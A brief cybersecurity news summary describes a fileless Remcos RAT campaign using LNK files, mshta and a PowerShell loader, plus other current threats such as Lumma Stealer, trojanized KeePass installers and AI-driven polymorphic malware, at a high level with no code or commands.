Researchers have detailed a new malware campaign deploying Remcos RAT using a PowerShell loader. Attackers use malicious LNK files in ZIP archives, often disguised as official Office documents. The attack chain uses mshta.exe with tax-related lures, executing remote HTA files via VBScript. Ultimately, a PowerShell script decodes and launches the Remcos RAT payload entirely in memory.
Remcos RAT is known malware offering attackers full system control for espionage and data theft.
It gathers system data, logs keystrokes, captures screens, and connects to a command-and-control server. Such fileless malware attacks are attractive because they operate stealthily directly in computer memory. This method helps evade many traditional security solutions by leaving very few traces on disk.
A new .NET loader, detailed by Unit 42 and Threatray, deploys diverse commodity malware. This loader uses multiple stages and steganography, like bitmap resources, to effectively hide payloads. Other active threats include trojanized KeePass installers dropping Cobalt Strike beacons for credential theft.
Additionally, Lumma Stealer is spread via ClickFix lures, and Formbook through malicious Office documents.
Recent cybersecurity threats are now increasingly complemented by advanced artificial intelligence-powered campaigns. These AI campaigns use polymorphic tricks, mutating malware in real-time to sidestep current detection efforts. AI helps automate malware development, scale attacks broadly, and precisely personalize many phishing messages. Such evolving threats can bypass traditional email filters, highlighting needs for post-delivery detection solutions.
Reference: